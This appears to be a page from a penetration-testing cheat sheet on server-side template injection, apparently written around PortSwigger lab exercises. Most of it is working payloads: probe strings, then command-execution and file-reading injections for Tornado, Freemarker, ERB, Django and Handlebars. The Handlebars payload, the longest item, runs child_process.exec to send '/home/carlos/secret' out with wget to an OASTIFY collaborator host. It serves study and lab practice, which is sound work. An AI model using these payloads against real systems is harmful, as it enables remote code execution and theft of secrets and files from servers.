SSTI

Use the web framework native template syntax to inject a malicious payload into a {{input}}, which is then executed server-side. Submitting invalid syntax will often result in error message that lead to identifying the template framework. Use PortSwigger template decision tree to aid in identification.

SSTI manually

#those will throw an error
${{<%[%'"}}%\.
${{<%[%'"}}%\.,
}}{{7*7}} 
{{fuzzer}}
${fuzzer}
${{fuzzer}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
${foobar}
{% debug %}

Tornado

}}{{ 7*7}}
blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('cat%20/home/carlos/secret')

Django

${{<%[%'"}}%\,
{% debug %} 
{{settings.SECRET_KEY}}

Freemarker

${foobar}
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cat /home/carlos/secret") }

ERB

fuzzer${{<%[%'"}}%\<>
<%= 7*7 %>

<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>

<%= system("cat /home/carlos/secret") %>

Handlebars

fuzzer${{<%[%'"}}%\,<>

#script to get file end send to collaborator
wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.pop}}
            {{this.push (lookup string.sub "constructor")}}
            {{this.pop}}
            {{#with string.split as |codelist|}}
                {{this.pop}}
                {{this.push "return require('child_process').exec('wget https://OASTIFY.COM --post-file=/home/carlos/secret');"}}
                {{this.pop}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
                        {{this}}
                    {{/with}}
                {{/each}}
            {{/with}}
        {{/with}}
    {{/with}}
{{/with}}

PreviousSSRF NextPath Traversal

Last updated 1 year ago